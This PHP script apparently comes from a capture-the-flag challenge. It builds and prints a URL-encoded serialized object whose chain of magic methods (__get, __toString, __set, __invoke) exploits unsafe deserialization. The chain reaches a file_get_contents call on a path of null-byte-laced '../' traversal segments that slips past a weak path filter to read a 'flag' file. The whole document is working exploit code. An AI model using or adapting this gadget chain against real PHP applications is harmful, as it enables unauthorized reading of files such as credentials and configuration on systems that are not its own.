<?php
class abaaba{
protected $DoNotGet;
public function __construct(){
$this->DoNotGet=new suhasuha();
}
public function __get($name){
return $this->DoNotGet->$name;
}
public function __toString(){
return $this->Giveme;
}
}
class Onemore{
public $file;
public function __construct(){
$this->file="../\x00../\x00../\x00../\x00../flag";
}
public function readfile(){
$this->file = isset($f) ? $f : 'image'.$this->file;
echo file_get_contents(safe($this->file));
}
public function __invoke(){
return $this->filename->Giveme;
}
}
class suhasuha{
private $Giveme;
public $action;
public function __construct(){
$this->action =[new Onemore(),'readfile'];
}
public function __set($name,$value){
$this->Giveme=($this->action)();
return $this->Giveme;
}
}
class One{
public $count;
public function __construct(){
$this->count = new abaaba();
}
public function __destruct(){
}
}
function safe($path){
$path = preg_replace("/.*\/\/.*/", "", $path);
$path = preg_replace("/\..\..*/", "!", $path);
$path = htmlentities($path);
return strip_tags($path);
}
echo urlencode(serialize(new One()));